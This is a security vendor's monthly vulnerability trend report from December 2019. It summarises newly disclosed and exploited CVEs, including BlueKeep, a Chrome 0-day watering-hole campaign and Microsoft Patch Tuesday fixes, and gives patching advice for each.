EclecticIQ
December 19, 2019

EclecticIQ Monthly Vulnerability Trend Report - November 2019

EIQ_FC_Monthly Vulnerability Report-2

This blogpost aims to provide customers with an overview of trends in vulnerability disclosures and announcements on a regular basis. Where applicable, the report will provide knowledge of known exploits for trending vulnerabilities and relevant courses of action. This report is not exhaustive in nature and as such, will not include every vulnerability announced that month.

Key Findings
  • The BlueKeep vulnerability in the Remote Desktop Protocol was exploited to install a cryptocurrency miner malware.
  • A Google Chrome 0-day was exploited in a Korean-language watering-hole attack.
  • Microsoft has patched 74 vulnerabilities, 13 of which are critical. 
Analysis

Newly Disclosed Vulnerabilities

Intel Processors

In November 2019, a vulnerability was disclosed to the public that targets Intel´s Transactional Synchronization Extensions (TSX), dubbed Zombieload v2 CVE-2019-11135 . Theoretically, it could allow a local attacker to steal sensitive data from the operating system kernel or other processes.

Researchers from VUSec group at VU Amsterdam and CISPA Helmholtz Center provided Intel with a Proof of Concept (POC) in September 2018 and researchers from TU Graz and Ku Leuven provided Proof of Concept (POC) in April 2019. Intel subsequently confirmed each submission demonstrates TAA individually.

Course of Action: 

  • Apply CVE-2019-11135 Patch

Linux

An integer overflow vulnerability CVE-2019-18805 was discovered in Linux Kernel versions prior to 5.0.11. An attacker can exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. 

Course of Action: 

  • Update Linux Kernel to Version 5.0.11

A use-after-free vulnerability CVE-2019-18408 was discovered in Libarchive, a multi-format archive and compression library. Versions before 3.4.0 are affected by the vulnerability. This could lead to denial-of-service conditions or the execution of arbitrary code if a malformed archive is processed.

Course of Action: 

  • Update Libarchive to version 3.4.0 or later

VMWare

VMWare issued a security advisory for multiple vulnerabilities affecting VMWare Workstation, Fusion and ESXi. Successful exploitation of the vulnerabilities could lead to an attacker gaining access with the same privileges as the exploited program.

  • CVE-2019-5540 - an information disclosure vulnerability in vmnetdhcp that if abused could allow an attacker on a guest VM to disclose sensitive information by leaking memory from the host process.
  • CVE-2019-5541 - covers an out-of-bounds write vulnerability in e1000e virtual network adapter that could lead to lead to code execution on the host from the guest or may allow attackers to create a denial-of-service condition on their own VM.
  • CVE-2019-5542 - denial-of-service vulnerability in the RPC handler.

Course of Action: 

  • Apply Issued Patch to Mitigate CVE-2019-5540, CVE-2019-5541 and CVE-2019-5542

Exploitation of Vulnerabilities

BlueKeep

On 2nd November, security researcher Kevin Beaumont posted on Twitter that multiple honeypots exposed to port 3389 (Remote Desktop Protocol - RDP) crashed and rebooted. The observed activity indicates successful BlueKeep CVE-2019-0708 exploitation in the wild.

The activity was observed in October 2019, and according to another security researcher MalwareTech, the exploitation attempts are not self-propagating. The attackers are probably working off a predefined target list of vulnerable systems. MalwareTech further reported that the payloads are multiple encoded PowerShell commands obtained from the attacker’s server, eventually leading to the installation of a cryptocurrency miner (Monero Miner 2ndsp6). 

The vulnerability only affects Windows 7, Windows Server 2008 R2, and Windows Server 2008 and a patch has been available for over 5 months.

Course of Action: 

  • Apply Microsoft May 2019 Security Patches

Google Chrome

In November 2019, public sources reported on a campaign dubbed Operation WizardOpium which dates back to September 2019. In this campaign a Korean-language news portal is used in a watering-hole style attack to exploit a Google Chrome 0-day vulnerability CVE-2019-13720 . The Malware Variant: WizardOpium Payload a3f31c that is installed on the victim system possesses persistence capabilities and attempts to download a second stage payload from the command and control (C2) server.

The specific Chrome vulnerability used in the campaign is a "use-after-free" vulnerability in Google Chrome browser's audio component, affecting Windows, Mac and Linux users. A use-after-free vulnerability could lead to program crashes, or it can facilitate the execution of arbitrary code, locally or remotely.

Course of Action: 

  • Update Google Chrome to version 78.0.3904.87 for Windows, Mac, and Linux

Patched Vulnerabilities

Microsoft November Patch Tuesday

Microsoft patched 74 vulnerabilities as part of their November 2019 patch Tuesday advisory, 13 of which are labeled as critical.

The critical vulnerability CVE-2019-1429 patched was observed being actively exploited in the wild. The vulnerability exists in the scripting engine in Internet Explorer and could allow an attacker to conduct a web-based attack via specially crafted web pages. The flaw resides in how the scripting engine in Internet Explorer handles objects in memory. The specific details of the active exploitation are unknown at the time of writing. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. 

Multiple other vulnerabilities labeled as critical were also addressed in the Patch Tuesday release, including a previously published vulnerability CVE-2019-1457 which resides in certain versions of Office for Mac.

Critical vulnerabilities addressed include:

  • CVE-2019-1373 - Microsoft Exchange Remote Code Execution Vulnerability
  • CVE-2019-1441 - Win32k Graphics Remote Code Execution Vulnerability
  • CVE-2019-1419 - OpenType Font Parsing Remote Code Execution Vulnerability
  • CVE-2019-1426 - Scripting Engine Memory Corruption Vulnerability
  • CVE-2019-1427 - Scripting Engine Memory Corruption Vulnerability
  • CVE-2019-1398 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-0719 - Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1397 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-0721 - Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1389 - Windows Hyper-V Remote Code Execution Vulnerability
  • CVE-2019-1430 - Microsoft Windows Media Foundation Remote Code Execution Vulnerability

Course of Action: 

  • Apply Patches Released in Microsoft November 2019 Patch Tuesday Bulletin
Recommendations

EclecticIQ Fusion Center recommends customers apply security updates to their systems as soon as they become available in order to mitigate against the risks posed by the vulnerabilities mentioned in this report. It is worth noting this report is a summary of the main vulnerabilities we have seen over the course of a month and as such is not reflective of the full list of CVE information published by vendors.

Users should ensure they manually update their own systems even if no security vulnerabilities have been reported.

We hope you enjoyed this post. Subscribe to our blog below for more interesting reads on Cyber Threat Intelligence or check out our resource section for whitepapers, threat analysis reports and more.